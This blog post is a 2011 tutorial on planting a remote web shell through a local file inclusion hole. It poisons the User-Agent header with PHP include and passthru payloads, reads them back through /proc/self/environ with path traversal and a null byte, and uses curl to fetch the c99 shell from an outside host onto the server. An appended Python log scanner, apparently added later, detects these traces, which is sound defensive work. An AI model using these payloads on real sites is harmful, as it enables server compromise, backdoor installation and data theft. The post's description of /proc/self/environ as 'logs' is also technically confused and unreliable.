Uploading shell by using LFI

Posted: February 25, 2011 by Hacking & Relax in Skill

================================
Required:
1. A site vulnerable to LFI
2. PHP knowledge
3. The Mozilla Firefox browser…
================================

So… first you find some site vulnerable to LFI… now we must check if there are logs…
They are usually stored in /proc/self/environ… so just replace /etc/passwd with /proc/self/environ

If you get something like “DOCUMENT_ROOT=…” then it means you successfully found the logs.

Now, on that page you can find something like “HTTP_USER_AGENT”…
This value is usually our user agent (Mozilla, Netscape, etc.): the server copies the User-Agent header of the current request into its environment, so whatever we send is what gets included. Now we must spoof it… but how?

Open a new tab in Mozilla Firefox and type “about:config” (without quotes)…

Now, in “Filter” type: general.useragent.extra.firefox

You will get something like this:

Code:
Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7

Now, double-click on general.useragent.extra.firefox and replace “Firefox/3.0.7”
with

Code:
<? include("http://shelladdress.com/c99.txt"); ?>

If everything is good the shell gets included… Otherwise you will get errors… Mostly I was getting the error “URL file-access is disabled” or something like that (that message means PHP's allow_url_include is off, so include() cannot fetch remote files)… but using PHP I found another way…

Instead of typing

Code:
<? include("http://shelladdress.com/c99.txt"); ?>

as the user agent, type this:

Code:
<? passthru($_GET['cmd']); ?>

Then load your vuln page like this:

Code:
http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ%00&cmd=curl http://shelladdress.com/c99.txt -o c99.php

So, let's review… basically, you are just adding the &cmd= parameter at the end of the URL…

Now, using the “curl” command you fetch the shell's content as a text file, and -o c99.php saves it on the server as c99.php…

Now simply go to your site like this:

Code:
http://yourvulnsite.com/c99.php

And that’s all…

Enjoy, and if I helped you, hit the thanks button…
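As an added example (not from the original post), the following Python script scans constructed Apache combined-format log lines for the traces this technique leaves behind: a request parameter pointing at /proc/self/environ, directory traversal, a %00 null byte, and PHP tags inside the User-Agent header. The sample log lines, the regular expression and the indicator names are my own assumptions.

```python
import re
from urllib.parse import unquote

# Constructed sample Apache combined-log lines (not taken from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [25/Feb/2011:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0 Firefox/3.0.7"
10.0.0.9 - - [25/Feb/2011:10:01:07 +0000] "GET /vulnscript.php?page=../../../proc/self/environ%00 HTTP/1.1" 200 2048 "-" "<? passthru($_GET['cmd']); ?>"
10.0.0.9 - - [25/Feb/2011:10:01:09 +0000] "GET /vulnscript.php?page=../../../proc/self/environ%00&cmd=id HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Feb/2011:10:02:00 +0000] "GET /c99.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return the list of indicator names found in one log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    # URL-decode once so %00, %2e%2e%2f and friends are compared in decoded form.
    path = unquote(m.group("path"))
    ua = m.group("ua")
    hits = []
    if "/proc/self/environ" in path:
        hits.append("proc_environ_read")
    if "../" in path:
        hits.append("path_traversal")
    if "\x00" in path:
        hits.append("null_byte_truncation")
    if "<?" in ua:
        hits.append("php_tag_in_user_agent")
    return hits


def scan(log_text):
    """Return (line_number, client_ip, hits) for every line carrying an indicator."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            findings.append((n, line.split()[0], hits))
    return findings


if __name__ == "__main__":
    for n, ip, hits in scan(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(hits)}")
```

Correlating the flagged source address with a later first-seen request for a new .php file (line 4 above) is the follow-up check a responder would add.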

Comments
  1. rlngs4 says:

    if we get nothing when trying /proc/self/environ?
